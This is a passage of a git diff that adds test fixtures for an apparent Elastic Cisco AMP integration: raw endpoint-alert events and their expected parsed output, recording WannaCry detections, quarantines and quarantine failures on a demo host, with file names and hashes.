+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
\ No newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log-expected.json
new file mode 100644
index 00000000000..485829d5bda
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log-expected.json
@@ -0,0 +1,5084 @@
+{
+    "expected": [
+        {
+            "process": {
+                "name": "mssecsvc.exe",
+                "pid": 6404,
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "@timestamp": "2021-01-14T17:39:50.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\Windows\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500123245Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":96000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419275394960065000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419275394960064595",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:49.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500128111Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":862000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419275390665097000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419275390665097297",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:49.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500130418Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":659000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419275390665097000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Cannot delete",
+                        "error_code": 3221225761
+                    },
+                    "detection_id": "6419275390665097295",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:49.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "\\\\?\\C:\\Windows\\mssecsvc.exe",
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500132533Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":831000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419275390665097000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419275390665097297",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "lsass.exe",
+                "pid": 708,
+                "hash": {
+                    "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
+                    "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
+                    "md5": "4e568dbe3fff1a0025eb432dc929b78f"
+                }
+            },
+            "@timestamp": "2021-01-14T17:39:49.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe",
+                "hash": {
+                    "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "md5": "db349b97c37d22f5ea1d1841e3c89eb4"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "db349b97c37d22f5ea1d1841e3c89eb4",
+                    "e889544aff85ffaf8b0d0da705105dee7c97fe26"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500134723Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":706000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419275390665097000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419275390665097296",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "lsass.exe",
+                "pid": 708,
+                "hash": {
+                    "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
+                    "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
+                    "md5": "4e568dbe3fff1a0025eb432dc929b78f"
+                }
+            },
+            "@timestamp": "2021-01-14T17:39:49.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "\\\\?\\C:\\Windows\\mssecsvc.exe",
+                "hash": {
+                    "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "md5": "db349b97c37d22f5ea1d1841e3c89eb4"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "db349b97c37d22f5ea1d1841e3c89eb4",
+                    "e889544aff85ffaf8b0d0da705105dee7c97fe26"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500136852Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419275390665097000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419275390665097295",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:49.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500138978Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419275390665097000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
